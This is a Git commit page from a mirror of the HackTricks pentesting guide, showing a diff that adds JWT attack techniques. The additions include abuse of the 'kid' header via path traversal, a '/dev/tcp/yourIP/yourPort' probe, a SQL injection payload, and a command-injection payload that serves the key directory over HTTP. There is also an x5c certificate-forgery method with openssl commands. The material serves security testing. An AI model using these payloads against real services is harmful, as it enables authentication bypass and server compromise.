0x22bb
/
hacktricks
mirror of https://github.com/carlospolop/hacktricks.git
1
2
Fork 0
Code Releases Activity

GitBook: [master] one page and one asset modified

This commit is contained in:
CPol 2021-03-10 15:11:26 +00:00 committed by gitbook-bot
parent 39c0d21fb7
commit 2d9b1b56eb
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
2 changed files with 23 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

BIN
.gitbook/assets/image (440).png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 112 KiB

25
pentesting-web/hacking-jwt-json-web-tokens.md
View File

@ -83,11 +83,11 @@ If you get an HTTP interaction you now know that the server is trying to load ke
`kid` is an optional header claim which holds a key identifier, particularly useful when you have multiple keys to sign the tokens and you need to look up the right one to verify the signature.
### "kid" issues - reveal key:
### "kid" issues - reveal key
If the claim "kid" is used in the header, check the web directory for that file or a variation of it. For example if `"kid":"key/12345"` then look for _/key/12345_ and _/key/12345.pem_ on the web root.
### "kid" issues - path traversal:
### "kid" issues - path traversal
If the claim "kid" is used in the header, check if you can use a different file in the file system. Pick a file you might be able to predict the content of, or maybe try `"kid":"/dev/tcp/yourIP/yourPort"` to test connectivity, or even some **SSRF** payloads...
_Use jwt\_tool's -T flag to tamper the JWT and change the value of the kid claim, then choose to keep the original signature_
@ -98,6 +98,14 @@ python3 jwt_tool.py <JWT> -I -hc kid -hv "../../dev/null" -S hs256 -p ""
Using files inside the host with known content you can also forge a valid JWT. For example, in linux systems the file `/proc/sys/kernel/randomize_va_space` has the value set to **2**. So, putting that **path** inside the "**kid**" parameter and using "**2**" as the **symetric password** to generate the JWT you should be able to generate a valid new JWT.
### "kid" issues - SQL Injection
In a scenario wehre the content of the "kid" is used to retreive the password from the database, you could change the payload inside the "kid" parameter to: `non-existent-index' UNION SELECT 'ATTACKER';-- -` and then sign the JWT with the secret key `ATTACKER`.
### "kid" issues - OS Injection
In a scenario where the "kid" parameter contains a path to the file with the key and this path is being used **inside an executed command** you could be able to obtain RCE and expose the private key with a payload like the following: `/root/res/keys/secret7.key; cd /root/res/keys/ && python -m SimpleHTTPServer 1337&`
## Miscellaneous attacks
The following are known weaknesses that should be tested for.
@ -163,6 +171,19 @@ Then you can use for example [**jwt.io**](https://jwt.io/) ****to create the new
You can also abuse both of these vulns **for SSRFs**.
### x5c
This parameter may contain the **certificate in base64**:
![](../.gitbook/assets/image%20%28440%29.png)
If the attacker **generates a self-signed certificate** and creates a forged token using the corresponding private key and replace the "x5c" parameters value with the newly generatedcertificate and modifies the other parameters, namely n, e and x5t then essentially the forgedtoken would get accepted by the server.
```bash
openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout attacker.key -outattacker.crt
openssl x509 -in attacker.crt -text
```
## Embedded Public Key \(CVE-2018-0114\)
If the JWT has embedded a public key like in the following scenario: